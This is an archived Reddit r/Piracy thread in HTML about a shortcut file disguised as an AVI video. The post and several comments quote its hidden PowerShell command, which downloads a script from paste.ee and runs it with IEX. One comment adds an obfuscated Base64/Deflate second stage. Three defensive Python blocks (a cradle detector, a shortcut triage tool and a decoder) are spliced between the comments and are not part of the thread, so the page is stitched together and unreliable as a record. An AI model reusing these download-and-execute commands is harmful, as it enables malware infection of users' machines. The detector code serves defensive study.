Created
March 23, 2019 02:19
<!doctype html> | |
<html lang="en"> | |
<head> | |
<meta charset="utf-8"> | |
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> | |
<link rel="stylesheet" href="../../../../../../../../static/css/lato.css"> | |
<link rel="stylesheet" href="../../../../../../../../static/css/bootstrap-superhero.min.css"> | |
<link rel="stylesheet" href="../../../../../../../../static/css/archive.css"> | |
<title>r/Piracy: Ran Across a Shortcut Disguised as an AVI File</title> | |
</head> | |
<body> | |
<main role="main" class="container-fluid"> | |
<div class="submission pt-3" data-id="9o7s0f"> | |
<h3 class="title">Ran Across a Shortcut Disguised as an AVI File</h3> | |
<p><span class="badge badge-primary">1</span> 2018-10-15 by <a class="author" href="../../../../../../../../user/killthealias.html">killthealias</a></p> | |
<div class="card bg-dark mb-3"><div class="card-body md"><p>Had the following code embedded in it </p> | |
<p>C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP $wcli = ((New-Object System.Net.WebClient)).DownloadString('<a href="https://paste.ee/r/oMFtp/0">https://paste.ee/r/oMFtp/0</a>');IEX $wcli </p> | |
<p>Can anyone make sense of it? Should I do anything to protect myself after accidentally running it? </p> | |
</div></div> | |
</div> | |
<div class="comments"> | |
<h5>29 comments</h5> | |
<div class="comment mb-3 ml-0" data-depth="0" data-id="e7s29gs"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/drifting_on.html">drifting_on</a> 2018-10-15</p> | |
<div class="md"><p>It's downloading from <a href="https://paste.ee/r/oMFtp/0">https://paste.ee/r/oMFtp/0</a> and then running whatever it downloads. Didn't open the link myself as it is going to be malware/virus/etc...</p> | |
<p>You should probably clean your computer</p> | |
</div> | |
</div> | |
<div class="comment mb-3 ml-1" data-depth="1" data-id="e7tprm2"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/NukeOfTheShadow.html">NukeOfTheShadow</a> 2018-10-15</p> | |
<div class="md"><p>“Page not found”</p>
</div> | |
</div> | |
<div class="comment mb-3 ml-1" data-depth="1" data-id="e7s2uqi"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/MediumBarber.html">MediumBarber</a> 2018-10-15</p> | |
<div class="md"><p>You know paste.ee is a pastebin alternative right? It's just a page full of text. Jeez.</p> | |
</div> | |
</div> | |
<div class="comment mb-3 ml-2" data-depth="2" data-id="e7s3jeu"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/drifting_on.html">drifting_on</a> 2018-10-15</p> | |
<div class="md"><blockquote> | |
<p>It's just a page full of text. Jeez. Opening the link in your browser won't do anything</p> | |
</blockquote> | |
<p>I never said it was going to do anything.</p> | |
</div> | |
</div> | |
<div class="comment mb-3 ml-3" data-depth="3" data-id="e7s4mj4"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/MediumBarber.html">MediumBarber</a> 2018-10-15</p> | |
<div class="md"><blockquote> | |
<p>Didn't open the link myself as it is going to be malware/virus/etc...</p> | |
</blockquote> | |
<p>You are saying the reason you didn't open the link was because it may be malware. Nothing is wrong with opening the link in a browser. The harmful part would be executing the script in PowerShell.</p> | |
</div> | |
</div> | |
<div class="comment mb-3 ml-4" data-depth="4" data-id="e7s5cxg"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/drifting_on.html">drifting_on</a> 2018-10-15</p> | |
<div class="md"><p>I was saying I didn't open the link cause I knew what it most likely was and wasn't going to analyze its contents. Though I can see how you could interpret what I wrote how you did</p> | |
</div> | |
</div> | |
<div class="comment mb-3 ml-5" data-depth="5" data-id="e7s7114"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/MediumBarber.html">MediumBarber</a> 2018-10-15</p> | |
<div class="md"><p>Sorry, I'm just not feeling well today and haven't slept properly in a few days. I get kinda agitated easily.</p> | |
</div> | |
</div> | |
<div class="comment mb-3 ml-2" data-depth="2" data-id="e7s3m9c"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/huckpie.html">huckpie</a> 2018-10-15</p> | |
<div class="md"><p>From what I can tell, the script downloads that paste to a text file and executes it. The file itself appears to be some obfuscated VBS which as we all know has been used for malicious intent.</p> | |
</div> | |
</div> | |
<div class="comment mb-3 ml-3" data-depth="3" data-id="e7s4fbo"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/Sunny_Cakes.html">Sunny_Cakes</a> 2018-10-15</p> | |
<div class="md"><p>How would the script execute itself though? Is it meant to be opened with a specific media player that allows for powershell scripts? </p> | |
</div> | |
</div> | |
<div class="comment mb-3 ml-4" data-depth="4" data-id="e7s6rmf"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/just_another_flogger.html">just_another_flogger</a> 2018-10-15</p> | |
<div class="md"><p>The shortcut isn't an AVI file, it's just a shortcut with .avi in the name of the shortcut.</p> | |
<p>The shortcut leads to powershell, which is installed on most PCs. It tried to download the raw content of a pastebin, save it as a script, and execute it.</p> | |
<p>This attack would fail on most systems, because the script would not be signed and most people are on the default security settings for powershell.</p> | |
</div> | |
</div> | |
<div class="comment mb-3 ml-5" data-depth="5" data-id="e7s6w26"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/Sunny_Cakes.html">Sunny_Cakes</a> 2018-10-15</p> | |
<div class="md"><p>Ah you mean, notavirus.avi.ps1? That's amateurish, I considered that scenario but honestly didn't believe people would post about such an obvious attack vector.</p> | |
</div> | |
</div> | |
<div class="comment mb-3 ml-3" data-depth="3" data-id="e7sgxu5"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/rakuanu.html">rakuanu</a> 2018-10-15</p> | |
<div class="md"><p>It seems the link is dead. I don't suppose you still have the data for it so I can study it?</p> | |
</div> | |
</div> | |
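<p>A defender-side way to spot the command line quoted in the post in process-creation logs: the sketch below expands the abbreviated switches and flags the fetch-then-Invoke-Expression pattern. It is an added example, not code from the thread; the function names, the switch list and the benign sample are assumptions of this example.</p>

```python
import re

# powershell.exe accepts case-insensitive abbreviations of its switches, so
# "-NoPr", "-WINd" and "-eXEc" must be expanded before they can be matched.
# Unique-prefix matching is this example's approximation of that behaviour.
SWITCHES = ("noprofile", "windowstyle", "executionpolicy", "encodedcommand",
            "noninteractive", "nologo", "command", "file")
TAKES_VALUE = ("windowstyle", "executionpolicy")
FETCH = re.compile(r"\b(downloadstring|downloadfile|downloaddata|"
                   r"invoke-webrequest|invoke-restmethod)\b", re.I)
EXEC = re.compile(r"\b(iex|invoke-expression)\b", re.I)
URL = re.compile(r"https?://[^\s'\")]+", re.I)

# The command line quoted in the post, and a constructed benign one.
SAMPLE_FROM_PAGE = (r"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe "
                    r"-NoPr -WINd 1 -eXEc ByP $wcli = ((New-Object System.Net."
                    r"WebClient)).DownloadString('https://paste.ee/r/oMFtp/0');"
                    r"IEX $wcli")
SAMPLE_BENIGN = r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"

def expand_switch(token):
    """Return the full lowercase switch name for an abbreviation, else None."""
    name = token.lstrip("-").lower()
    hits = [s for s in SWITCHES if name and s.startswith(name)]
    return hits[0] if len(hits) == 1 else None

def analyze(cmdline):
    """Flag host switches and the fetch-then-execute pattern in one command line."""
    tokens, flags, i = cmdline.split(), {}, 1      # tokens[0] is the executable
    while i < len(tokens) and tokens[i].startswith("-"):
        full = expand_switch(tokens[i])
        if full is None:
            break
        has_value = full in TAKES_VALUE and i + 1 < len(tokens)
        flags[full] = tokens[i + 1].lower() if has_value else ""
        i += 2 if has_value else 1
    window, policy = flags.get("windowstyle", ""), flags.get("executionpolicy", "")
    fetch, run = bool(FETCH.search(cmdline)), bool(EXEC.search(cmdline))
    return {
        "switches": sorted(flags),
        # WindowStyle 1 is Hidden: the user sees no console window.
        "hidden_window": window == "1" or (window != "" and "hidden".startswith(window)),
        # Bypass turns off execution-policy enforcement for this process; accepting
        # a prefix such as "ByP" is an assumption made to cover the page's sample.
        "policy_bypass": policy != "" and "bypass".startswith(policy),
        "remote_fetch": fetch,
        "dynamic_exec": run,
        "urls": URL.findall(cmdline),
        "verdict": "download-and-execute" if fetch and run else "no-cradle",
    }

if __name__ == "__main__":
    for line in (SAMPLE_FROM_PAGE, SAMPLE_BENIGN):
        print(analyze(line))
```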
<div class="comment mb-3 ml-0" data-depth="0" data-id="e7s46mo"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/drzendoom.html">drzendoom</a> 2018-10-15</p> | |
<div class="md"><p>Yeah, I got hit as well, any solutions?</p>
</div> | |
</div> | |
<div class="comment mb-3 ml-0" data-depth="0" data-id="e7s4nvq"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/MediumBarber.html">MediumBarber</a> 2018-10-15</p> | |
<div class="md"><p>How exactly was it "disguised" as an AVI file?</p> | |
</div> | |
</div> | |
<div class="comment mb-3 ml-1" data-depth="1" data-id="e7s4ttn"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/Halfpipe1234.html">Halfpipe1234</a> 2018-10-15</p> | |
<div class="md"><p>I'm guessing a streaming site or something</p> | |
</div> | |
</div> | |
<div class="comment mb-3 ml-2" data-depth="2" data-id="e7s73us"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/MediumBarber.html">MediumBarber</a> 2018-10-15</p> | |
<div class="md"><p>This would require it to be downloaded and executed though. In that case it would be obvious it's not an AVI file.</p> | |
</div> | |
</div> | |
<div class="comment mb-3 ml-1" data-depth="1" data-id="e7s80sx"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/just_another_flogger.html">just_another_flogger</a> 2018-10-15</p> | |
<div class="md"><p>Could be placed in a RAR/ZIP that's been 0-byte padded to look large, then you right click -> extract -> double click it.</p> | |
</div> | |
</div> | |
<div class="comment mb-3 ml-2" data-depth="2" data-id="e7sfq7c"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/MediumBarber.html">MediumBarber</a> 2018-10-15</p> | |
<div class="md"><p>But you would see the file extension is not avi after extraction.</p> | |
</div> | |
</div> | |
<div class="comment mb-3 ml-3" data-depth="3" data-id="e7skayx"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/just_another_flogger.html">just_another_flogger</a> 2018-10-15</p> | |
<div class="md"><p>That is inaccurate.</p> | |
</div> | |
</div> | |
<div class="comment mb-3 ml-4" data-depth="4" data-id="e7ue4oh"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/MediumBarber.html">MediumBarber</a> 2018-10-15</p> | |
<div class="md"><p>That's actually exactly how I thought they did it. However if you have file extensions DISABLED normally you would find it weird to see it there. (I always have them enabled.) I also have shortcut arrows removed, so tbh this is the perfect thing to target me, except for the fact that I use MPC-HC as default so I'd notice something wrong with the file icon.</p> | |
</div> | |
</div> | |
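<p>Explorer hides the .lnk extension even when file extensions are shown, which is why a shortcut named with .avi before it reads as a video. The added example below (not code from the thread) checks ZIP members for that naming and for the Shell Link header before anything is extracted; the media-extension list, function names and sample archive are assumptions of this example.</p>

```python
import io
import struct
import zipfile

# Shell Link header: HeaderSize 0x4C followed by the LinkCLSID
# 00021401-0000-0000-C000-000000000046 in its on-disk byte order.
LNK_MAGIC = bytes.fromhex("4c000000" "0114020000000000c000000000000046")
HAS_ARGUMENTS = 0x20   # LinkFlags bit set when command-line arguments are stored
MEDIA_EXT = (".avi", ".mkv", ".mp4", ".mov", ".wmv")   # assumed list of lure types

def inspect_member(name, head):
    """Classify one archive member from its name and its first 24 bytes."""
    named_lnk = name.lower().endswith(".lnk")
    is_link = head[:20] == LNK_MAGIC
    # What the user sees in Explorer: the trailing ".lnk" is not displayed.
    shown_as = name[:-4] if named_lnk else name
    flags = struct.unpack_from("<I", head, 20)[0] if is_link and len(head) >= 24 else 0
    return {
        "name": name,
        "shown_as": shown_as,
        "is_shell_link": is_link,
        "disguised": named_lnk and shown_as.lower().endswith(MEDIA_EXT),
        # A shortcut that carries arguments can pass a whole script to its target.
        "has_arguments": bool(flags & HAS_ARGUMENTS),
    }

def triage_zip(blob):
    """Inspect every file in a ZIP held in memory; nothing is written to disk."""
    results = []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:      # read only the header bytes
                results.append(inspect_member(info.filename, fh.read(24)))
    return results

def constructed_zip():
    """Constructed test archive: a bare 76-byte link header and a text file."""
    link = LNK_MAGIC + struct.pack("<I", 0x01 | HAS_ARGUMENTS | 0x80) + bytes(52)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Movie.2018.avi.lnk", link)
        zf.writestr("readme.txt", "constructed sample")
    return buf.getvalue()

if __name__ == "__main__":
    for row in triage_zip(constructed_zip()):
        print(row)
```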
<div class="comment mb-3 ml-0" data-depth="0" data-id="e7s87o3"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/exodus_cl.html">exodus_cl</a> 2018-10-15</p> | |
<div class="md"><p>An AVI file with that string??? Could you share more info?</p>
</div> | |
</div> | |
<div class="comment mb-3 ml-1" data-depth="1" data-id="e7uzpu2"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/adr0ckin.html">adr0ckin</a> 2018-10-15</p> | |
<div class="md"><p>C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP $wcli = ((New-Object System.Net.WebClient)).DownloadString('<a href="https://paste.ee/r/aftkm/0">https://paste.ee/r/aftkm/0</a>');IEX $wcli</p> | |
<p>Here is the <a href="https://paste.ee">paste.ee</a> site..</p>
<p>( nEW-OBJEcT Io.cOMPRESSIoN.DeFlaTesTrEAM([io.meMoRystREAM] [SysTEM.cOnvErT]::FroMbAsE64sTRINg('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' ) ,[sYStEm.io.COmPReSsioN.coMPRESSIoNmoDE]::dEcOMpreSS ) |FoREaCH-oBJECT{ nEW-OBJEcT systEM.Io.StREAmReADeR($_ , [teXT.EnCoDIng]::aScIi )}).REaDtOEND( )| inVokE-eXPrESSion </p> | |
</div> | |
</div> | |
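<p>The second stage quoted above is a Base64 string wrapped in a DeflateStream and piped to Invoke-Expression, so it can be read statically by undoing those two encodings without running it. This is an added example, not code from the thread; the function names are assumptions, and the test input is constructed with a harmless payload and without the execution tail.</p>

```python
import base64
import re
import zlib

# Matches the Base64 literal handed to [Convert]::FromBase64String('...'),
# whatever letter case the obfuscator used.
B64_ARG = re.compile(r"FromBase64String\(\s*'([A-Za-z0-9+/=\s]+)'", re.I)

def peel_layer(script, max_out=1_000_000):
    """Decode one Base64 + DEFLATE layer to text without executing anything."""
    m = B64_ARG.search(script)
    if m is None:
        return None
    try:
        raw = base64.b64decode(m.group(1))
        # .NET DeflateStream reads raw DEFLATE (no zlib header): wbits=-15.
        # max_out caps the output so a decompression bomb cannot exhaust memory.
        data = zlib.decompressobj(wbits=-15).decompress(raw, max_out)
    except (ValueError, zlib.error):
        return None        # literal was not Base64 of a DEFLATE stream
    if not data:
        return None        # truncated or empty stream: nothing recovered
    return data.decode("ascii", errors="replace")

def peel_all(script, max_layers=5):
    """Peel nested layers; return each recovered stage, outermost first."""
    stages = []
    while len(stages) < max_layers:
        inner = peel_layer(script)
        if inner is None:
            break
        stages.append(inner)
        script = inner
    return stages

def constructed_sample(payload, depth=2):
    """Build a harmless test input in the wrapper's shape (constructed data)."""
    text = payload
    for _ in range(depth):
        comp = zlib.compressobj(9, zlib.DEFLATED, -15)
        blob = comp.compress(text.encode("ascii")) + comp.flush()
        b64 = base64.b64encode(blob).decode("ascii")
        text = ("( nEW-OBJEcT Io.cOMPRESSIoN.DeFlaTesTrEAM([io.meMoRystREAM] "
                "[SysTEM.cOnvErT]::FroMbAsE64sTRINg('" + b64 + "' ) ,"
                "[sYStEm.io.COmPReSsioN.coMPRESSIoNmoDE]::dEcOMpreSS )")
    return text

BENIGN = "Write-Output 'constructed benign payload'"

if __name__ == "__main__":
    for n, stage in enumerate(peel_all(constructed_sample(BENIGN)), 1):
        print(n, stage[:70])
```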
<div class="comment mb-3 ml-0" data-depth="0" data-id="e7sb1s9"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/RobinsonDickinson.html">RobinsonDickinson</a> 2018-10-15</p> | |
<div class="md"><p>So how did you get it in the first place? A file just doesn't randomly download itself..</p>
</div> | |
</div> | |
<div class="comment mb-3 ml-1" data-depth="1" data-id="e7sh0n5"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/CaineBK.html">CaineBK</a> 2018-10-15</p> | |
<div class="md"><p>Relevant flair. </p> | |
</div> | |
</div> | |
<div class="comment mb-3 ml-0" data-depth="0" data-id="e7sfol5"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/rakuanu.html">rakuanu</a> 2018-10-15</p> | |
<div class="md"><p>I'm no expert by any means, but it seems that the page it tries to retrieve data from has been removed by the website itself, so I would imagine that its intended payload was never retrieved, thus... a dead malware file? I could be totally wrong though.</p>
</div> | |
</div> | |
<div class="comment mb-3 ml-1" data-depth="1" data-id="e7sjtom"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/waSItaSdm.html">waSItaSdm</a> 2018-10-15</p> | |
<div class="md"><p>Yes, the link is dead so there's no string to download and execute. Got lucky this time.</p> | |
</div> | |
</div> | |
<div class="comment mb-3 ml-0" data-depth="0" data-id="e7sxtfw"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/streamingisretarded.html">streamingisretarded</a> 2018-10-15</p> | |
<div class="md"><p>that'll learn ya for downloading crazy rich asians</p> | |
</div> | |
</div> | |
<div class="comment mb-3 ml-0" data-depth="0" data-id="e7t7jbf"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/EqualityOfAutonomy.html">EqualityOfAutonomy</a> 2018-10-15</p> | |
<div class="md"><p>Since that page is 404 you may have been lucky and it didn't work as intended.</p> | |
</div> | |
</div> | |
<div class="comment mb-3 ml-0" data-depth="0" data-id="e7uzg3l"> | |
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a> <a class="author" href="../../../../../../../../user/adr0ckin.html">adr0ckin</a> 2018-10-15</p> | |
<div class="md"><p>Here is the script I got..</p>
<p>C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP $wcli = ((New-Object System.Net.WebClient)).DownloadString('<a href="https://paste.ee/r/aftkm/0">https://paste.ee/r/aftkm/0</a>');IEX $wcli</p> | |
</div> | |
</div> | |
</div> | |
</main> | |
<footer class="container-fluid"> | |
<a class="to-top mt-1 mb-1 btn btn-lg btn-primary" href="#top">top of page</a> | |
<p class="small mb-0">data archived 2018-10-15. <a href="https://github.com/libertysoft3/reddit-html-archiver">source code</a>.</p> | |
</footer> | |
<script src="../../../../../../../../static/js/jquery-3.3.1.slim.min.js"></script> | |
<script src="../../../../../../../../static/js/bootstrap.min.js"></script> | |
<script src="../../../../../../../../static/js/archive-comments.js"></script> | |
</body> |